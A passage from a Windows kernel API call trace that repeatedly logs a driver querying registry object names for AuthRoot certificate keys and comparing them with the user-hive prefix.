| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\323C118E1BF7B8B65254E2E2100DD6029037F096, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\323C118E1BF7B8B65254E2E2100DD6029037F096 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\32F442093B36D7031B75CA4DADDCB327FAA02B9C, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\32F442093B36D7031B75CA4DADDCB327FAA02B9C | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\32F442093B36D7031B75CA4DADDCB327FAA02B9C, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\32F442093B36D7031B75CA4DADDCB327FAA02B9C | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\32F442093B36D7031B75CA4DADDCB327FAA02B9C, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\32F442093B36D7031B75CA4DADDCB327FAA02B9C | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\335A7FF00927CF2DF278E2C9192F7A4D5534F80C, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\335A7FF00927CF2DF278E2C9192F7A4D5534F80C | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\335A7FF00927CF2DF278E2C9192F7A4D5534F80C, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\335A7FF00927CF2DF278E2C9192F7A4D5534F80C | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\335A7FF00927CF2DF278E2C9192F7A4D5534F80C, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\335A7FF00927CF2DF278E2C9192F7A4D5534F80C | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\339B6B1450249B557A01877284D9E02FC3D2D8E9, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\339B6B1450249B557A01877284D9E02FC3D2D8E9 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\339B6B1450249B557A01877284D9E02FC3D2D8E9, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\339B6B1450249B557A01877284D9E02FC3D2D8E9 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\339B6B1450249B557A01877284D9E02FC3D2D8E9, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\339B6B1450249B557A01877284D9E02FC3D2D8E9 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\342CD9D3062DA48C346965297F081EBC2EF68FDC, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\342CD9D3062DA48C346965297F081EBC2EF68FDC | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\342CD9D3062DA48C346965297F081EBC2EF68FDC, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\342CD9D3062DA48C346965297F081EBC2EF68FDC | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\342CD9D3062DA48C346965297F081EBC2EF68FDC, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\342CD9D3062DA48C346965297F081EBC2EF68FDC | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\34D499426F9FC2BB27B075BAB682AAE5EFFCBA74, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\34D499426F9FC2BB27B075BAB682AAE5EFFCBA74 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\34D499426F9FC2BB27B075BAB682AAE5EFFCBA74, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\34D499426F9FC2BB27B075BAB682AAE5EFFCBA74 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\34D499426F9FC2BB27B075BAB682AAE5EFFCBA74, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\34D499426F9FC2BB27B075BAB682AAE5EFFCBA74 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x100, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0b2d00, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfe, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0b2d00, Length = 0xfe, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd000291a8c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3679CA35668772304D30A5FB873B0FA77BB70D54, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\3679CA35668772304D30A5FB873B0FA77BB70D54 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
